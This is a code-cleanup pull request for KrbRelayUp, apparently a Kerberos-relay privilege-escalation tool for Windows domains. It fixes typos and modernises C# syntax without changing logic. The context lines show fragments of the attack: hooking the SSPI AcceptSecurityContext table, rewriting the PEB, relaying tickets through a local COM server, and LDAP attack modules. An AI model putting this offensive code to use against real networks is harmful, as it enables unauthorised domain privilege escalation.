             var modValuePtr = Marshal.AllocHGlobal(IntPtr.Size * 2);
-            Helpers.ByteArraysToBerValueArray(modValue.Select(_ => _ ?? new byte[0]).ToArray(), modValuePtr);
+            Helpers.ByteArraysToBerValueArray(modValue.Select(_ => _ ?? Array.Empty<byte>()).ToArray(), modValuePtr);
             List<LDAPMod> mod = new List<LDAPMod> {
                 new LDAPMod {
                     mod_op = (int)LdapModOperation.LDAP_MOD_ADD | (int)LdapModOperation.LDAP_MOD_BVALUES,

--- a/KrbRelayUp/Relay/Attacks/Generic.cs
+++ b/KrbRelayUp/Relay/Attacks/Generic.cs
@@ -152,7 +152,7 @@ namespace KrbRelayUp.Relay.Attacks.Ldap
                 ld,
                 $"{Relay.domainDN}",
                 (int)LdapSearchScope.LDAP_SCOPE_SUBTREE,
-                String.Format("(&(objectClass=computer)(sAMAccountName={0}))", computername),
+                $"(&(objectClass=computer)(sAMAccountName={computername}))",
                 pLaps,
                 0);
             //Console.WriteLine("[*] msgID: {0}", search);
@@ -205,7 +205,7 @@ namespace KrbRelayUp.Relay.Attacks.Ldap
                 ld,
                 $"{Relay.domainDN}",
                 (int)LdapSearchScope.LDAP_SCOPE_SUBTREE,
-                String.Format("(&(objectClass=*)(sAMAccountName={0}))", adObject),
+                $"(&(objectClass=*)(sAMAccountName={adObject}))",
                 pLaps,
                 0);
             //Console.WriteLine("[*] msgID: {0}", search);

--- a/KrbRelayUp/Relay/Com/COMInterfaces.cs
+++ b/KrbRelayUp/Relay/Com/COMInterfaces.cs
@@ -15,9 +15,7 @@
 //    along with OleViewDotNet.  If not, see <http://www.gnu.org/licenses/>.
 
 using System;
-using System.Collections.Generic;
 using System.Runtime.InteropServices;
-using System.Runtime.InteropServices.ComTypes;
 
 namespace KrbRelayUp.Relay.Com
 {

--- a/KrbRelayUp/Relay/Com/COMObjRef.cs
+++ b/KrbRelayUp/Relay/Com/COMObjRef.cs
@@ -467,13 +467,7 @@ namespace KrbRelayUp.Relay.Com
 
         public int ProcessId => COMUtilities.GetProcessIdFromIPid(Ipid);
 
-        public string ProcessName
-        {
-            get
-            {
-                return COMUtilities.GetProcessNameById(ProcessId);
-            }
-        }
+        public string ProcessName => COMUtilities.GetProcessNameById(ProcessId);
 
         public int ApartmentId => COMUtilities.GetApartmentIdFromIPid(Ipid);
         public string ApartmentName => COMUtilities.GetApartmentIdStringFromIPid(Ipid);

--- a/KrbRelayUp/Relay/Com/COMUtilities.cs
+++ b/KrbRelayUp/Relay/Com/COMUtilities.cs
@@ -423,7 +423,7 @@ namespace KrbRelayUp.Relay.Com
                 int current = Interlocked.Increment(ref _current);
                 if ((current % MINIMUM_REPORT_SIZE) == 1)
                 {
-                    _progress.Report(new Tuple<string, int>(String.Format("Querying Interfaces: {0} of {1}", current, _total_count),
+                    _progress.Report(new Tuple<string, int>($"Querying Interfaces: {current} of {_total_count}",
                         (100 * current) / _total_count));
                 }
             }
@@ -451,7 +451,7 @@ namespace KrbRelayUp.Relay.Com
                     return "MTA";
 
                 default:
-                    return String.Format("STA (Thread ID {0})", appid);
+                    return $"STA (Thread ID {appid})";
             }
         }
 
@@ -471,7 +471,7 @@ namespace KrbRelayUp.Relay.Com
             }
             else
             {
-                string full_path = Path.Combine(base_path, string.Format("{0}.winmd", name));
+                string full_path = Path.Combine(base_path, $"{name}.winmd");
                 if (File.Exists(full_path))
                 {
                     asm = Assembly.ReflectionOnlyLoadFrom(full_path);

--- a/KrbRelayUp/Relay/Com/COMUtilities.cs
+++ b/KrbRelayUp/Relay/Com/COMUtilities.cs
@@ -14,25 +14,13 @@
 //    You should have received a copy of the GNU General Public License
 //    along with OleViewDotNet.  If not, see <http://www.gnu.org/licenses/>.
 
-using Microsoft.CSharp;
-using Microsoft.Win32;
 using System;
-using System.CodeDom;
-using System.CodeDom.Compiler;
-using System.Collections.Concurrent;
 using System.Collections.Generic;
 using System.Diagnostics;
 using System.IO;
-using System.Linq;
 using System.Reflection;
 using System.Runtime.InteropServices;
-using System.Runtime.InteropServices.ComTypes;
-using System.Runtime.InteropServices.WindowsRuntime;
-using System.Security;
-using System.Security.Cryptography;
-using System.Security.Principal;
 using System.Text;
-using System.Text.RegularExpressions;
 using System.Threading;
 
 //using System.Windows.Forms;

--- a/KrbRelayUp/Relay/IStorage/IEnumSTATSTG.cs
+++ b/KrbRelayUp/Relay/IStorage/IEnumSTATSTG.cs
@@ -1,5 +1,4 @@
-﻿using System;
-using System.Runtime.InteropServices;
+﻿using System.Runtime.InteropServices;
 
 namespace KrbRelayUp.Relay
 {

--- a/KrbRelayUp/Relay/IStorage/ILockBytes.cs
+++ b/KrbRelayUp/Relay/IStorage/ILockBytes.cs
@@ -1,5 +1,4 @@
-﻿using System;
-using System.Runtime.InteropServices;
+﻿using System.Runtime.InteropServices;
 
 namespace KrbRelayUp.Relay
 {

--- a/KrbRelayUp/Relay/IStorage/ILockBytes.cs
+++ b/KrbRelayUp/Relay/IStorage/ILockBytes.cs
@@ -20,6 +20,6 @@ namespace KrbRelayUp.Relay
 
         void UnlockRegion(long libOffset, long cb, int dwLockType);
 
-        void Stat(out System.Runtime.InteropServices.STATSTG pstatstg, int grfStatFlag);
+        void Stat(out STATSTG pstatstg, int grfStatFlag);
     }
 }

--- a/KrbRelayUp/Relay/IStorage/IStream.cs
+++ b/KrbRelayUp/Relay/IStorage/IStream.cs
@@ -1,5 +1,4 @@
-﻿using System;
-using System.Runtime.InteropServices;
+﻿using System.Runtime.InteropServices;
 
 namespace KrbRelayUp.Relay
 {

--- a/KrbRelayUp/Relay/Ldap.cs
+++ b/KrbRelayUp/Relay/Ldap.cs
@@ -1,9 +1,5 @@
 ﻿using System;
-using System.Collections.Generic;
-using System.Linq;
 using System.Runtime.InteropServices;
-using System.Text.RegularExpressions;
-using System.Threading;
 using static KrbRelayUp.Relay.Natives;
 using static KrbRelayUp.Relay.Relay;
 

--- a/KrbRelayUp/Relay/Misc/Helpers.cs
+++ b/KrbRelayUp/Relay/Misc/Helpers.cs
@@ -25,12 +25,12 @@ namespace KrbRelayUp.Relay
             // locate the crypto system for the hash type we want
             int status = Interop.CDLocateCSystem(etype, out pCSystemPtr);
 
-            pCSystem = (Interop.KERB_ECRYPT)System.Runtime.InteropServices.Marshal.PtrToStructure(pCSystemPtr, typeof(Interop.KERB_ECRYPT));
+            pCSystem = (Interop.KERB_ECRYPT)Marshal.PtrToStructure(pCSystemPtr, typeof(Interop.KERB_ECRYPT));
             if (status != 0)
-                throw new System.ComponentModel.Win32Exception(status, "Error on CDLocateCSystem");
+                throw new Win32Exception(status, "Error on CDLocateCSystem");
 
             // get the delegate for the password hash function
-            Interop.KERB_ECRYPT_HashPassword pCSystemHashPassword = (Interop.KERB_ECRYPT_HashPassword)System.Runtime.InteropServices.Marshal.GetDelegateForFunctionPointer(pCSystem.HashPassword, typeof(Interop.KERB_ECRYPT_HashPassword));
+            Interop.KERB_ECRYPT_HashPassword pCSystemHashPassword = (Interop.KERB_ECRYPT_HashPassword)Marshal.GetDelegateForFunctionPointer(pCSystem.HashPassword, typeof(Interop.KERB_ECRYPT_HashPassword));
             Interop.UNICODE_STRING passwordUnicode = new Interop.UNICODE_STRING(password);
             Interop.UNICODE_STRING saltUnicode = new Interop.UNICODE_STRING(salt);
 
@@ -41,7 +41,7 @@ namespace KrbRelayUp.Relay
             if (status != 0)
                 throw new Win32Exception(status);
 
-            return System.BitConverter.ToString(output).Replace("-", "");
+            return BitConverter.ToString(output).Replace("-", "");
         }
 
         public static byte[] unhexlify(string hexvalue)
@@ -150,7 +150,7 @@ namespace KrbRelayUp.Relay
         {
             if (length < 0x80)
 
-                return new byte[] { (byte)length };
+                return new[] { (byte)length };
 
             if (length < 0x100)
 

--- a/KrbRelayUp/Relay/Misc/Natives.cs
+++ b/KrbRelayUp/Relay/Misc/Natives.cs
@@ -394,10 +394,7 @@ namespace KrbRelayUp.Relay
             public UIntPtr UniqueProcessId;
             public int InheritedFromUniqueProcessId;
 
-            public int Size
-            {
-                get { return Marshal.SizeOf(typeof(PROCESS_BASIC_INFORMATION)); }
-            }
+            public int Size => Marshal.SizeOf(typeof(PROCESS_BASIC_INFORMATION));
         }
 
         [StructLayout(LayoutKind.Sequential)]

--- a/KrbRelayUp/Relay/Misc/Natives.cs
+++ b/KrbRelayUp/Relay/Misc/Natives.cs
@@ -212,7 +212,7 @@ namespace KrbRelayUp.Relay
         internal static extern void ldap_value_free_len(IntPtr vals);
 
         [DllImport("Wtsapi32.dll")]
-        public static extern bool WTSQuerySessionInformation(IntPtr hServer, int sessionId, WTS_INFO_CLASS wtsInfoClass, out System.IntPtr ppBuffer, out uint pBytesReturned);
+        public static extern bool WTSQuerySessionInformation(IntPtr hServer, int sessionId, WTS_INFO_CLASS wtsInfoClass, out IntPtr ppBuffer, out uint pBytesReturned);
 
         [DllImport("advapi32.dll", EntryPoint = "SystemFunction018", SetLastError = true, CallingConvention = CallingConvention.StdCall)]
         private static extern NTStatus RtlEncryptNtOwfPwdWithNtSesKey([In] byte[] ntOwfPassword, [In] ref byte[] sessionkey, [In, Out] byte[] encryptedNtOwfPassword);
@@ -396,7 +396,7 @@ namespace KrbRelayUp.Relay
 
             public int Size
             {
-                get { return (int)Marshal.SizeOf(typeof(PROCESS_BASIC_INFORMATION)); }
+                get { return Marshal.SizeOf(typeof(PROCESS_BASIC_INFORMATION)); }
             }
         }
 

--- a/KrbRelayUp/Relay/Relay.cs
+++ b/KrbRelayUp/Relay/Relay.cs
@@ -146,7 +146,7 @@ namespace KrbRelayUp.Relay
                 if (port == "-1")
                 {
                     Console.WriteLine("[-] No available ports found");
-                    Console.WriteLine("[-] Firwall will block our COM connection. Exiting");
+                    Console.WriteLine("[-] Firewall will block our COM connection. Exiting");
                     return;
                 }
                 Console.WriteLine("[+] Port {0} available", port);
@@ -200,7 +200,7 @@ namespace KrbRelayUp.Relay
                 ticket = Helpers.ConvertApReq(ticket);
                 if (ticket[0] != 0x60)
                 {
-                    Console.WriteLine("[-] Recieved invalid apReq, exploit will fail");
+                    Console.WriteLine("[-] Received invalid apReq, exploit will fail");
                     Console.WriteLine("{0}", Helpers.ByteArrayToString(ticket));
                     Environment.Exit(0);
                 }

--- a/KrbRelayUp/Relay/Relay.cs
+++ b/KrbRelayUp/Relay/Relay.cs
@@ -8,7 +8,6 @@ using System.Net;
 using System.Net.NetworkInformation;
 using System.Runtime.InteropServices;
 using System.Text;
-using System.Threading.Tasks;
 using static KrbRelayUp.Relay.Natives;
 
 namespace KrbRelayUp.Relay

--- a/KrbRelayUp/Relay/Relay.cs
+++ b/KrbRelayUp/Relay/Relay.cs
@@ -17,9 +17,9 @@ namespace KrbRelayUp.Relay
         public static Guid clsId_guid = new Guid("90f18417-f0f1-484e-9d3c-59dceee5dbd8");
         public static SECURITY_HANDLE ldap_phCredential = new SECURITY_HANDLE();
         public static IntPtr ld = IntPtr.Zero;
-        public static byte[] apRep1 = new byte[] { };
-        public static byte[] apRep2 = new byte[] { };
-        public static byte[] ticket = new byte[] { };
+        public static byte[] apRep1 = { };
+        public static byte[] apRep2 = { };
+        public static byte[] ticket = { };
         public static string spn = "";
         public static string relayedUser = "";
         public static string relayedUserDomain = "";
@@ -29,7 +29,6 @@ namespace KrbRelayUp.Relay
         public static bool useSSL = false;
         public static string sid = "";
         public static string port = "";
-
 
         public static void Run(string aDomain, string aDomainController, string aComputerSid, string aPort="12345")
         {
@@ -104,15 +103,16 @@ namespace KrbRelayUp.Relay
             AcceptSecurityContextFunc AcceptSecurityContextDeleg = new AcceptSecurityContextFunc(AcceptSecurityContext_);
             byte[] bAcceptSecurityContext = BitConverter.GetBytes(Marshal.GetFunctionPointerForDelegate(AcceptSecurityContextDeleg).ToInt64());
             int oAcceptSecurityContext = Marshal.OffsetOf(typeof(SecurityFunctionTable), "AcceptSecurityContex").ToInt32();
-            Marshal.Copy(bAcceptSecurityContext, 0, (IntPtr)functionTable + oAcceptSecurityContext, bAcceptSecurityContext.Length);
+            Marshal.Copy(bAcceptSecurityContext, 0, functionTable + oAcceptSecurityContext, bAcceptSecurityContext.Length);
             //get new value
             table = (SecurityFunctionTable)Marshal.PtrToStructure(functionTable, typeof(SecurityFunctionTable));
             //Console.WriteLine("[*] New AcceptSecurityContex: {0}", table.AcceptSecurityContex);
 
             Console.WriteLine("[+] Rewriting PEB");
             //Init RPC server
-            var svcs = new SOLE_AUTHENTICATION_SERVICE[] {
-                new SOLE_AUTHENTICATION_SERVICE() {
+            var svcs = new[] {
+                new SOLE_AUTHENTICATION_SERVICE
+                {
                     dwAuthnSvc = 16, // HKLM\SOFTWARE\Microsoft\Rpc\SecurityService sspicli.dll
                     pPrincipalName = spn
                 }
@@ -142,7 +142,7 @@ namespace KrbRelayUp.Relay
             if (!checkPort(int.Parse(port)))
             {
                 Console.WriteLine("[+] Looking for available ports..");
-                port = checkPorts(new string[] { "SYSTEM" }).ToString();
+                port = checkPorts(new[] { "SYSTEM" }).ToString();
                 if (port == "-1")
                 {
                     Console.WriteLine("[-] No available ports found");
@@ -155,7 +155,7 @@ namespace KrbRelayUp.Relay
             //COM object
             Console.WriteLine("[+] Register COM server");
             byte[] ba = ComUtils.GetMarshalledObject(new object());
-            COMObjRefStandard std = (COMObjRefStandard)COMObjRefStandard.FromArray(ba);
+            COMObjRefStandard std = (COMObjRefStandard)COMObjRef.FromArray(ba);
 
             std.StringBindings.Clear();
             std.StringBindings.Add(new COMStringBinding(RpcTowerId.Tcp, "127.0.0.1"));
@@ -186,7 +186,6 @@ namespace KrbRelayUp.Relay
                 Console.WriteLine(e);
             }
         }
-
 
         [STAThread]
         public static SecStatusCode AcceptSecurityContext_([In] SecHandle phCredential, [In] SecHandle phContext, [In] SecurityBufferDescriptor pInput, AcceptContextReqFlags fContextReq, SecDataRep TargetDataRep, [In, Out] SecHandle phNewContext, [In, Out] IntPtr pOutput, out AcceptContextRetFlags pfContextAttr, [Out] SECURITY_INTEGER ptsExpiry)
@@ -245,12 +244,11 @@ namespace KrbRelayUp.Relay
             {
                 byte[] nbytes = new byte[254];
                 Marshal.Copy(apRep1, 0, ogSecBuffer.Token + 116, apRep1.Length); // verify this 116 offset?
-                Marshal.Copy(nbytes, 0, (IntPtr)ogSecBuffer.Token + apRep1.Length + 116, nbytes.Length);
+                Marshal.Copy(nbytes, 0, ogSecBuffer.Token + apRep1.Length + 116, nbytes.Length);
             }
 
             return ret;
         }
-
 
         public static void setUserData()
         {
@@ -269,7 +267,7 @@ namespace KrbRelayUp.Relay
             NtQueryInformationProcess(hProcess, 0, ref pbi, Marshal.SizeOf(pbi), ref RetLen);
 
             //https://docs.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-rtl_user_process_parameters
-            IntPtr pProcessParametersOffset = (IntPtr)(pbi.PebBaseAddress + 0x20);
+            IntPtr pProcessParametersOffset = pbi.PebBaseAddress + 0x20;
             byte[] addrBuf = new byte[IntPtr.Size];
             ReadProcessMemory(hProcess, pProcessParametersOffset, addrBuf, addrBuf.Length, out temp);
             IntPtr processParametersOffset = (IntPtr)BitConverter.ToInt64(addrBuf, 0);

--- a/KrbRelayUp/S4U.cs
+++ b/KrbRelayUp/S4U.cs
@@ -1,9 +1,6 @@
 ﻿using Asn1;
 using KrbRelayUp.lib.Interop;
 using System;
-using System.Collections.Generic;
-using System.Linq;
-using System.Text;
 
 namespace KrbRelayUp
 {


### PR DESCRIPTION
Just a general code cleanup.
- A few spelling mistakes. Particularly in the help text.
- Removed unused namespaces
- Removed redundant code such as full type names and this/base reference
- Sorted modifiers such that they are consistent across
- Use Array.Empty<T> instead of new[0]. This reduces the number of allocations.
- You don't have to use Environment.Exit() when you can just return. If you want to return an exit code, change Main() to return an integer and simply return the exit code.
- Changed all the string.Format() calls to use interpolation. The obvious benefit is readability, but another is that it uses the StringBuilderPool internally, thereby reducing allocations.

Each of these changes are in their own commits. None of the changes modify any logic, it is purely cleanup.